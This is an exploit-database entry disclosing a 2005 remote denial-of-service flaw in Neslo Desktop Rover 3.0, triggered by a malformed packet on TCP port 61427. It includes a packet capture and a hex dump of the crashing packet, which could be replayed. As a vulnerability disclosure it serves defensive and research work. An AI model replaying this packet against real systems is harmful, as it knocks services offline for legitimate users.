Neslo Desktop Rover 3.0 - Malformed Packet Remote Denial of Service

2005-04-20T00:00:00
ID EXPLOITPACK:2CA7D65722E9835A4EB233157844F8E1
Type exploitpack
Reporter Adam Baldwin
Modified 2005-04-20T00:00:00

Description

Neslo Desktop Rover 3.0 - Malformed Packet Remote Denial of Service

                                        
                                            source: https://www.securityfocus.com/bid/13281/info

Neslo Desktop Rover is prone to a remote denial of service. Reports indicate that the software will crash when a malformed packet is processed on TCP port 61427.

A remote attacker may exploit this condition crash the software and effectively deny service for legitimate users. 

20:23:48.778009 192.168.28.133.32771 > 192.168.28.129.61427: P [tcp sum ok]
1:13(12) ack 1 win 5840 (DF) (ttl 64, id 24051, len 64)

4500 0040 5df3 4000 4006 226e c0a8 1c85
c0a8 1c81 8003 eff3 90a8 d150 7cda 8afa
8018 16d0 daab 0000 0101 080a 0000 8cbe
0000 0000 6352 0100 0000 0000 0000 0000